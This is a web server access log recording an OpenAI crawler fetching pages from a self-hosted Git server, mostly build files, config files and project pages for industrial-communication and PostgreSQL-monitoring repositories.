[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:17:00:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10291] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:17:00:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11117] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:00:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14656] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:00:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig?display=rendered" [Client 74.7.227.38] [Length 11036] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:17:00:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig?display=source" [Client 74.7.227.38] [Length 11580] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:17:00:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/watchdog_final_debug.spec" [Client 74.7.227.38] [Length 769] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_debug.spec" +[17/Feb/2026:17:00:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTestApp.dir%2flink.d" [Client 74.7.227.38] [Length 28015] [Gzip 6.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:17:00:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2f3.31.10%2fCompilerIdC" [Client 74.7.227.38] [Length 54123] [Gzip 12.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:17:00:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fmodbus_exception.hpp" [Client 74.7.227.38] [Length 18530] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:17:00:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:00:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:00:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:00:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10008] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:00:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10005] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:00:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10002] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:00:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11349] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:00:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11351] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:00:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11352] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:00:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2f3.31.10%2fCompilerIdCXX" [Client 74.7.227.38] [Length 54704] [Gzip 12.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:17:00:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fmodbus_exception.hpp" [Client 74.7.227.38] [Length 24029] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:17:00:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTestApp.dir%2flink.txt" [Client 74.7.227.38] [Length 24708] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:17:00:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2fcmake.check_cache" [Client 74.7.227.38] [Length 24707] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:00:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip?display=source" [Client 74.7.227.38] [Length 11570] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:17:00:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query" +[17/Feb/2026:17:00:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query" +[17/Feb/2026:17:00:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query" +[17/Feb/2026:17:00:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:00:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:00:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:00:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10264] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:00:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10265] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:00:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:00:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:00:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:00:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10263] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:00:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 10061] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:17:00:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 14800] [Gzip 7.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:17:00:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/Program.cs?display=rendered" [Client 74.7.227.38] [Length 11111] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/Program.cs" +[17/Feb/2026:17:00:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:17:00:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:17:00:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets?display=rendered" [Client 74.7.227.38] [Length 11166] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" +[17/Feb/2026:17:00:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html" +[17/Feb/2026:17:00:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2fcontroller-next-todo.md" [Client 74.7.227.38] [Length 25061] [Gzip 4.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-next-todo.md" +[17/Feb/2026:17:00:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/labels?sort=mostissues&state=" [Client 74.7.227.38] [Length 7636] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/labels" +[17/Feb/2026:17:00:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=all&type=all" +[17/Feb/2026:17:00:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/PostgresWatchdog.spec?display=rendered" [Client 74.7.227.38] [Length 11137] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:17:00:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11769] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:17:00:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11739] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:17:00:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/docker-compose.yml" 